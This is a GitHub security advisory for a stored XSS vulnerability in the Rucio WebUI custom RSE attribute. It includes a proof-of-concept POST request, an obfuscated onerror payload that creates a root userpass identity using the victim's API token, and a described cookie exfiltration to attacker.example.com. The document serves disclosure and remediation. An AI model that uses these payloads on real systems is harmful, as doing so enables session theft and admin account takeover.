Skip to content

Rucio WebUI has a Stored Cross-site Scripting (XSS) Vulnerability in its Custom RSE Attribute

Moderate severity GitHub Reviewed Published Feb 25, 2026 in rucio/rucio • Updated Feb 27, 2026

Package

pip rucio-webui (pip)

Affected versions

< 35.8.3
>= 36.0.0rc1, < 38.5.4
>= 39.0.0rc1, < 39.3.1

Patched versions

35.8.3
38.5.4
39.3.1

Description

Summary

A stored Cross-site Scripting (XSS) vulnerability was identified in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.

Details

A stored XSS payload can be introduced via a custom RSE attribute value and is later rendered when the RSE is viewed.

Create Path:
Admin > RSE Management > RSE NAME > Add Attribute

Trigger Path:
Admin > RSE Management > RSE NAME

Request

POST /proxy/rses/WEB1/attr/XSS HTTP/1.1
...
{"value":"<script>alert('XSS')</script>"}

Response

HTTP/1.1 201 CREATED
...
Created

Storing XSS Payload in RSE Attribute
Storing XSS Payload in RSE Attribute

XSS Payload triggering when viewing RSE
XSS Payload triggering when viewing RSE

Impact

Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.

The impact is amplified by:

  • Session cookies that are accessible to JavaScript (missing HttpOnly flag).
  • API tokens exposed to the WebUI via JavaScript variables.

An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.

XSS Payload to Create Root UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Remediation / Mitigation

All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.

Additional defense-in-depth measures include:

  • Enforcing a strict Content Security Policy (CSP).
  • Setting the HttpOnly flag on session cookies.
  • Avoiding exposure of API tokens in JavaScript-accessible variables.

Note that many pages were found setting the API token as token in an authenticated response like var token = "root-root-webui-...:" (See /ui/list_accounts for example)

Resources

References

@bziemons bziemons published to rucio/rucio Feb 25, 2026
Published to the GitHub Advisory Database Feb 25, 2026
Reviewed Feb 25, 2026
Published by the National Vulnerability Database Feb 25, 2026
Last updated Feb 27, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(17th percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

Sensitive Cookie Without 'HttpOnly' Flag

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag. Learn more on MITRE.

CVE ID

CVE-2026-25736

GHSA ID

GHSA-fq4f-4738-rqxm

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.